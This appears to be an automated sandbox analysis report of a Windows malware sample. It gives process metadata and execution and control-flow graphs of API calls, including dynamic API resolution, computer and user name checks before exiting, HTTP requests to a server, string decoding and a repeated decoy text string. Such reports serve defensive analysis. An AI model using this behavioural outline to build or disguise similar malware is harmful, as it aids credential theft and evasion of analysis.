                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:16
                                Start time:01:21:13
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1300
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                  Execution Graph

                                  Execution Coverage:6.6%
                                  Dynamic/Decrypted Code Coverage:4.9%
                                  Signature Coverage:12.3%
                                  Total number of Nodes:1417
                                  Total number of Limit Nodes:28
27001->27002 27003 4045c0 34 API calls 27002->27003 27004 40395b 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 403974 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 40398d 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 4039a6 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 4039bf 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 4039d8 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 4039f1 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 403a0a 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 403a23 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 403a3c 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 403a55 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 403a6e 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 403a87 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 403aa0 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 403ab9 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 403ad2 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 403aeb 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 403b04 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 403b1d 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 403b36 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 403b4f 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 403b68 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 403b81 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 403b9a 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403bb3 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 403bcc 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 403be5 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 403bfe 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 403c17 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 403c30 27061->27062 27063 4045c0 34 API calls 
27062->27063 27064 403c49 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403c62 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403c7b 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403c94 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403cad 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403cc6 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403cdf 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403cf8 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403d11 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403d2a 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403d43 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403d5c 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 403d75 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403d8e 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 403da7 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403dc0 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 403dd9 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 403df2 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403e0b 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403e24 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403e3d 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 403e56 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403e6f 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 403e88 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403ea1 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 403eba 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403ed3 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 403eec 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403f05 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403f1e 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 403f37 27123->27124 27125 
4045c0 34 API calls 27124->27125 27126 403f50 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 403f69 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 403f82 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 403f9b 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 403fb4 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 403fcd 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 403fe6 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 403fff 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 404018 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 404031 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 40404a 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 404063 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 40407c 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 404095 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 4040ae 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 4040c7 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 4040e0 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 4040f9 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 404112 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 40412b 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 404144 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 40415d 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 404176 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 40418f 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 4041a8 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 4041c1 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 4041da 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 4041f3 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 40420c 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 404225 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 40423e 
27185->27186 27187 4045c0 34 API calls 27186->27187 27188 404257 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 404270 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 404289 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 4042a2 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 4042bb 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 4042d4 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 4042ed 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 404306 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 40431f 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 404338 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 404351 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 40436a 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 404383 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 40439c 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 4043b5 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 4043ce 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 4043e7 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 404400 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 404419 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 404432 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 40444b 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 404464 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 40447d 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 404496 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 4044af 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 4044c8 27237->27238 27239 4045c0 34 API calls 27238->27239 27240 4044e1 27239->27240 27241 4045c0 34 API calls 27240->27241 27242 4044fa 27241->27242 27243 4045c0 34 API calls 27242->27243 27244 404513 27243->27244 27245 4045c0 34 API calls 27244->27245 27246 40452c 27245->27246 27247 4045c0 34 API calls 
27246->27247 27248 404545 27247->27248 27249 4045c0 34 API calls 27248->27249 27250 40455e 27249->27250 27251 4045c0 34 API calls 27250->27251 27252 404577 27251->27252 27253 4045c0 34 API calls 27252->27253 27254 404590 27253->27254 27255 4045c0 34 API calls 27254->27255 27256 4045a9 27255->27256 27257 419c10 27256->27257 27258 419c20 43 API calls 27257->27258 27259 41a036 8 API calls 27257->27259 27258->27259 27260 41a146 27259->27260 27261 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27259->27261 27262 41a153 8 API calls 27260->27262 27263 41a216 27260->27263 27261->27260 27262->27263 27264 41a298 27263->27264 27265 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27263->27265 27266 41a2a5 6 API calls 27264->27266 27267 41a337 27264->27267 27265->27264 27266->27267 27268 41a344 9 API calls 27267->27268 27269 41a41f 27267->27269 27268->27269 27270 41a4a2 27269->27270 27271 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27269->27271 27272 41a4ab GetProcAddress GetProcAddress 27270->27272 27273 41a4dc 27270->27273 27271->27270 27272->27273 27274 41a515 27273->27274 27275 41a4e5 GetProcAddress GetProcAddress 27273->27275 27276 41a612 27274->27276 27277 41a522 10 API calls 27274->27277 27275->27274 27278 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27276->27278 27279 41a67d 27276->27279 27277->27276 27278->27279 27280 41a686 GetProcAddress 27279->27280 27281 41a69e 27279->27281 27280->27281 27282 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27281->27282 27283 415ca3 27281->27283 27282->27283 27284 401590 27283->27284 27559 401670 27284->27559 27287 41a7a0 lstrcpy 27288 4015b5 27287->27288 27289 41a7a0 lstrcpy 27288->27289 27290 4015c7 27289->27290 27291 41a7a0 lstrcpy 27290->27291 27292 4015d9 27291->27292 27293 41a7a0 lstrcpy 27292->27293 27294 401663 27293->27294 27295 415510 27294->27295 27296 415521 27295->27296 
27297 41a820 2 API calls 27296->27297 27298 41552e 27297->27298 27299 41a820 2 API calls 27298->27299 27300 41553b 27299->27300 27301 41a820 2 API calls 27300->27301 27302 415548 27301->27302 27303 41a740 lstrcpy 27302->27303 27304 415555 27303->27304 27305 41a740 lstrcpy 27304->27305 27306 415562 27305->27306 27307 41a740 lstrcpy 27306->27307 27308 41556f 27307->27308 27309 41a740 lstrcpy 27308->27309 27349 41557c 27309->27349 27310 41a740 lstrcpy 27310->27349 27311 41a8a0 lstrcpy 27311->27349 27312 415643 StrCmpCA 27312->27349 27313 4156a0 StrCmpCA 27314 4157dc 27313->27314 27313->27349 27315 41a8a0 lstrcpy 27314->27315 27316 4157e8 27315->27316 27317 41a820 2 API calls 27316->27317 27319 4157f6 27317->27319 27318 41a820 lstrlenA lstrcpy 27318->27349 27321 41a820 2 API calls 27319->27321 27320 415856 StrCmpCA 27322 415991 27320->27322 27320->27349 27324 415805 27321->27324 27323 41a8a0 lstrcpy 27322->27323 27326 41599d 27323->27326 27327 401670 lstrcpy 27324->27327 27325 401590 lstrcpy 27325->27349 27328 41a820 2 API calls 27326->27328 27347 415811 27327->27347 27331 4159ab 27328->27331 27329 4152c0 29 API calls 27329->27349 27330 4151f0 23 API calls 27330->27349 27333 41a820 2 API calls 27331->27333 27332 415a0b StrCmpCA 27334 415a16 Sleep 27332->27334 27335 415a28 27332->27335 27336 4159ba 27333->27336 27334->27349 27337 41a8a0 lstrcpy 27335->27337 27338 401670 lstrcpy 27336->27338 27339 415a34 27337->27339 27338->27347 27340 41a820 2 API calls 27339->27340 27341 415a43 27340->27341 27342 41a820 2 API calls 27341->27342 27343 415a52 27342->27343 27345 401670 lstrcpy 27343->27345 27344 41578a StrCmpCA 27344->27349 27345->27347 27346 41a7a0 lstrcpy 27346->27349 27347->26403 27348 41593f StrCmpCA 27348->27349 27349->27310 27349->27311 27349->27312 27349->27313 27349->27318 27349->27320 27349->27325 27349->27329 27349->27330 27349->27332 27349->27344 27349->27346 27349->27348 27351 417553 GetVolumeInformationA 27350->27351 27352 41754c 27350->27352 27353 417591 
27351->27353 27352->27351 27354 4175fc GetProcessHeap HeapAlloc 27353->27354 27355 417619 27354->27355 27356 417628 wsprintfA 27354->27356 27357 41a740 lstrcpy 27355->27357 27358 41a740 lstrcpy 27356->27358 27359 415da7 27357->27359 27358->27359 27359->26424 27361 41a7a0 lstrcpy 27360->27361 27362 404899 27361->27362 27568 4047b0 27362->27568 27364 4048a5 27365 41a740 lstrcpy 27364->27365 27366 4048d7 27365->27366 27367 41a740 lstrcpy 27366->27367 27368 4048e4 27367->27368 27369 41a740 lstrcpy 27368->27369 27370 4048f1 27369->27370 27371 41a740 lstrcpy 27370->27371 27372 4048fe 27371->27372 27373 41a740 lstrcpy 27372->27373 27374 40490b InternetOpenA StrCmpCA 27373->27374 27375 404944 27374->27375 27376 404955 27375->27376 27377 404ecb InternetCloseHandle 27375->27377 27581 418b60 GetSystemTime lstrcpy lstrcpy 27376->27581 27378 404ee8 27377->27378 27576 409ac0 CryptStringToBinaryA 27378->27576 27380 404963 27582 41a920 lstrcpy lstrcpy lstrcatA 27380->27582 27383 404976 27385 41a8a0 lstrcpy 27383->27385 27390 40497f 27385->27390 27386 41a820 2 API calls 27387 404f05 27386->27387 27388 41a9b0 4 API calls 27387->27388 27391 404f1b 27388->27391 27389 404f27 ctype 27392 41a7a0 lstrcpy 27389->27392 27394 41a9b0 4 API calls 27390->27394 27393 41a8a0 lstrcpy 27391->27393 27405 404f57 27392->27405 27393->27389 27395 4049a9 27394->27395 27396 41a8a0 lstrcpy 27395->27396 27397 4049b2 27396->27397 27398 41a9b0 4 API calls 27397->27398 27399 4049d1 27398->27399 27400 41a8a0 lstrcpy 27399->27400 27401 4049da 27400->27401 27583 41a920 lstrcpy lstrcpy lstrcatA 27401->27583 27403 4049f8 27404 41a8a0 lstrcpy 27403->27404 27406 404a01 27404->27406 27405->26427 27407 41a9b0 4 API calls 27406->27407 27408 404a20 27407->27408 27409 41a8a0 lstrcpy 27408->27409 27410 404a29 27409->27410 27411 41a9b0 4 API calls 27410->27411 27412 404a48 27411->27412 27413 41a8a0 lstrcpy 27412->27413 27414 404a51 27413->27414 27415 41a9b0 4 API calls 27414->27415 27416 404a7d 27415->27416 27584 41a920 
lstrcpy lstrcpy lstrcatA 27416->27584 27418 404a84 27419 41a8a0 lstrcpy 27418->27419 27420 404a8d 27419->27420 27421 404aa3 InternetConnectA 27420->27421 27421->27377 27422 404ad3 HttpOpenRequestA 27421->27422 27424 404b28 27422->27424 27425 404ebe InternetCloseHandle 27422->27425 27426 41a9b0 4 API calls 27424->27426 27425->27377 27427 404b3c 27426->27427 27428 41a8a0 lstrcpy 27427->27428 27429 404b45 27428->27429 27585 41a920 lstrcpy lstrcpy lstrcatA 27429->27585 27431 404b63 27432 41a8a0 lstrcpy 27431->27432 27433 404b6c 27432->27433 27434 41a9b0 4 API calls 27433->27434 27435 404b8b 27434->27435 27436 41a8a0 lstrcpy 27435->27436 27437 404b94 27436->27437 27438 41a9b0 4 API calls 27437->27438 27439 404bb5 27438->27439 27440 41a8a0 lstrcpy 27439->27440 27441 404bbe 27440->27441 27442 41a9b0 4 API calls 27441->27442 27443 404bde 27442->27443 27444 41a8a0 lstrcpy 27443->27444 27445 404be7 27444->27445 27446 41a9b0 4 API calls 27445->27446 27447 404c06 27446->27447 27448 41a8a0 lstrcpy 27447->27448 27449 404c0f 27448->27449 27586 41a920 lstrcpy lstrcpy lstrcatA 27449->27586 27451 404c2d 27452 41a8a0 lstrcpy 27451->27452 27453 404c36 27452->27453 27454 41a9b0 4 API calls 27453->27454 27455 404c55 27454->27455 27456 41a8a0 lstrcpy 27455->27456 27457 404c5e 27456->27457 27458 41a9b0 4 API calls 27457->27458 27459 404c7d 27458->27459 27460 41a8a0 lstrcpy 27459->27460 27461 404c86 27460->27461 27587 41a920 lstrcpy lstrcpy lstrcatA 27461->27587 27463 404ca4 27464 41a8a0 lstrcpy 27463->27464 27465 404cad 27464->27465 27466 41a9b0 4 API calls 27465->27466 27467 404ccc 27466->27467 27468 41a8a0 lstrcpy 27467->27468 27469 404cd5 27468->27469 27470 41a9b0 4 API calls 27469->27470 27471 404cf6 27470->27471 27472 41a8a0 lstrcpy 27471->27472 27473 404cff 27472->27473 27474 41a9b0 4 API calls 27473->27474 27475 404d1f 27474->27475 27476 41a8a0 lstrcpy 27475->27476 27477 404d28 27476->27477 27478 41a9b0 4 API calls 27477->27478 27479 404d47 27478->27479 27480 41a8a0 lstrcpy 
27479->27480 27481 404d50 27480->27481 27588 41a920 lstrcpy lstrcpy lstrcatA 27481->27588 27483 404d6e 27484 41a8a0 lstrcpy 27483->27484 27485 404d77 27484->27485 27486 41a740 lstrcpy 27485->27486 27487 404d92 27486->27487 27589 41a920 lstrcpy lstrcpy lstrcatA 27487->27589 27489 404db3 27590 41a920 lstrcpy lstrcpy lstrcatA 27489->27590 27491 404dba 27492 41a8a0 lstrcpy 27491->27492 27493 404dc6 27492->27493 27494 404de7 lstrlenA 27493->27494 27495 404dfa 27494->27495 27496 404e03 lstrlenA 27495->27496 27591 41aad0 27496->27591 27498 404e13 HttpSendRequestA 27499 404e32 InternetReadFile 27498->27499 27500 404e67 InternetCloseHandle 27499->27500 27505 404e5e 27499->27505 27503 41a800 27500->27503 27502 41a9b0 4 API calls 27502->27505 27503->27425 27504 41a8a0 lstrcpy 27504->27505 27505->27499 27505->27500 27505->27502 27505->27504 27596 41aad0 27506->27596 27508 4117c4 StrCmpCA 27509 4117d7 27508->27509 27510 4117cf ExitProcess 27508->27510 27511 4117e7 strtok_s 27509->27511 27525 4117f4 27511->27525 27512 4119c2 27512->26429 27513 41199e strtok_s 27513->27525 27514 4118ad StrCmpCA 27514->27525 27515 4118cf StrCmpCA 27515->27525 27516 4118f1 StrCmpCA 27516->27525 27517 411951 StrCmpCA 27517->27525 27518 411970 StrCmpCA 27518->27525 27519 411913 StrCmpCA 27519->27525 27520 411932 StrCmpCA 27520->27525 27521 41185d StrCmpCA 27521->27525 27522 41187f StrCmpCA 27522->27525 27523 41a820 lstrlenA lstrcpy 27523->27525 27524 41a820 2 API calls 27524->27513 27525->27512 27525->27513 27525->27514 27525->27515 27525->27516 27525->27517 27525->27518 27525->27519 27525->27520 27525->27521 27525->27522 27525->27523 27525->27524 27526->26435 27527->26437 27528->26443 27529->26445 27530->26451 27531->26453 27532->26457 27533->26461 27534->26465 27535->26471 27536->26473 27537->26477 27538->26491 27539->26494 27540->26495 27541->26490 27542->26495 27543->26510 27544->26497 27545->26501 27546->26502 27547->26507 27548->26512 27549->26514 27550->26521 27551->26527 27552->26548 
27553->26552 27554->26551 27555->26547 27556->26551 27557->26561 27560 41a7a0 lstrcpy 27559->27560 27561 401683 27560->27561 27562 41a7a0 lstrcpy 27561->27562 27563 401695 27562->27563 27564 41a7a0 lstrcpy 27563->27564 27565 4016a7 27564->27565 27566 41a7a0 lstrcpy 27565->27566 27567 4015a3 27566->27567 27567->27287 27592 401030 27568->27592 27572 404838 lstrlenA 27595 41aad0 27572->27595 27574 404848 InternetCrackUrlA 27575 404867 27574->27575 27575->27364 27577 409af9 LocalAlloc 27576->27577 27578 404eee 27576->27578 27577->27578 27579 409b14 CryptStringToBinaryA 27577->27579 27578->27386 27578->27389 27579->27578 27580 409b39 LocalFree 27579->27580 27580->27578 27581->27380 27582->27383 27583->27403 27584->27418 27585->27431 27586->27451 27587->27463 27588->27483 27589->27489 27590->27491 27591->27498 27593 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27592->27593 27594 41aad0 27593->27594 27594->27572 27595->27574 27596->27508 27722 416ab1 902 API calls 27691 4069f3 7 API calls 27664 22f0297 131 API calls 27665 22fae93 43 API calls ctype 27724 41cafe 219 API calls 4 library calls 27726 22fcce9 162 API calls ___crtLCMapStringA 27760 22f19e7 StrCmpCA ExitProcess strtok_s strtok_s 27761 22f35e4 9 API calls 26168 401190 26175 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26168->26175 26170 40119e 26171 4011cc 26170->26171 26177 417850 GetProcessHeap HeapAlloc GetUserNameA 26170->26177 26173 4011b7 26173->26171 26174 4011c4 ExitProcess 26173->26174 26176 417939 26175->26176 26176->26170 26178 4178c3 26177->26178 26178->26173 27727 22f30f9 7 API calls 27728 41ce9f 69 API calls __amsg_exit 27729 22ef8f1 32 API calls 27668 4088a4 RaiseException task __CxxThrowException@8 27669 4180a5 GetProcessHeap HeapFree 27693 22f13c7 strtok_s strtok_s 27695 41b9b0 RtlUnwind 27734 22f3823 8 API calls 27736 22f30d0 9 API calls

                                  Control-flow Graph

                                  APIs
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                  • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                  • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                  • strlen.MSVCRT ref: 004046F0
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
